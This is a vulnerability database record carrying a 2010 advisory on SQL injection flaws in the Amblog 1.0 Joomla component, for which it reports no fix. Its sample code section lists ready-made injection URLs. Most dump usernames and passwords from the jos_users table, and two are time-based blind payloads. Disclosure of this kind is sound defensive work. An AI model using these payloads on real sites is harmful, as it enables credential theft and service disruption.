{"id": "SECURITYVULNS:DOC:24485", "bulletinFamily": "software", "title": "Amblog 1.0 Joomla Component Multiple SQL Injection Vulnerabilities", "description": "Amblog 1.0 Joomla Component Multiple SQL Injection Vulnerabilities\r\n\r\n Name Amblog\r\n Vendor http://robitbt.hu\r\n Versions Affected 1.0\r\n\r\n Author Salvatore Fresta aka Drosophila\r\n Website http://www.salvatorefresta.net\r\n Contact salvatorefresta [at] gmail [dot] com\r\n Date 2010-08-10\r\n\r\nX. INDEX\r\n\r\n I. ABOUT THE APPLICATION\r\n II. DESCRIPTION\r\n III. ANALYSIS\r\n IV. SAMPLE CODE\r\n V. FIX\r\n \r\n\r\nI. ABOUT THE APPLICATION\r\n________________________\r\n\r\nAmblog is a simple blog engine for Joomla CMS.\r\n\r\n\r\nII. DESCRIPTION\r\n_______________\r\n\r\nSome parameters are not properly sanitised before being\r\nused in SQL queries.\r\n\r\n\r\nIII. ANALYSIS\r\n_____________\r\n\r\nSummary:\r\n\r\n A) Multiple SQL Injection\r\n B) Multiple Blind SQL Injection\r\n \r\n\r\nA) Multiple SQL Injection\r\n_________________________\r\n\r\nSome parameters, such as articleid and catid, are not\r\nproperly sanitised before being used in SQL queries.This\r\ncan be exploited to manipulate SQL queries by injecting\r\narbitrary SQL code.\r\n\r\n\r\nB) Multiple Blind SQL Injection\r\n_________________________\r\n\r\nThe articleid parameter is not properly sanitised before\r\nbeing used in SQL queries. This can be exploited to\r\nmanipulate SQL queries by injecting arbitrary SQL code.\r\n\r\n\r\nIV. SAMPLE CODE\r\n_______________\r\n\r\nA) Multiple SQL Injection\r\n\r\nhttp://site/path/index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version\r\n\r\nhttp://site/path/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users\r\n\r\nhttp://site/path/index.php?option=com_amblog&task=newform&catid=-1 UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users\r\n\r\nhttp://site/path/index.php?option=com_amblog&task=editform&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users\r\n\r\nhttp://site/path/index.php?option=com_amblog&task=editcommentform&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users\r\n\r\nhttp://site/path/index.php?option=com_amblog&task=savenewcomment&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users\r\n\r\nhttp://site/path/index.php?option=com_amblog&task=saveeditcomment&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users\r\n\r\n\r\nB) Multiple Blind SQL Injection\r\n\r\nhttp://site/path/index.php?option=com_amblog&task=editsave&articleid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))\r\n\r\nhttp://site/path/index.php?option=com_amblog&task=delete&articleid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))\r\n\r\n\r\nV. FIX\r\n______\r\n\r\nNo fix.\r\n", "published": "2010-08-12T00:00:00", "modified": "2010-08-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24485", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:36", "edition": 1, "viewCount": 9, "enchantments": {"score": {"value": 2.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11066"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11066"]}]}, "exploitation": null, "vulnersScore": 2.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645674345}}

{}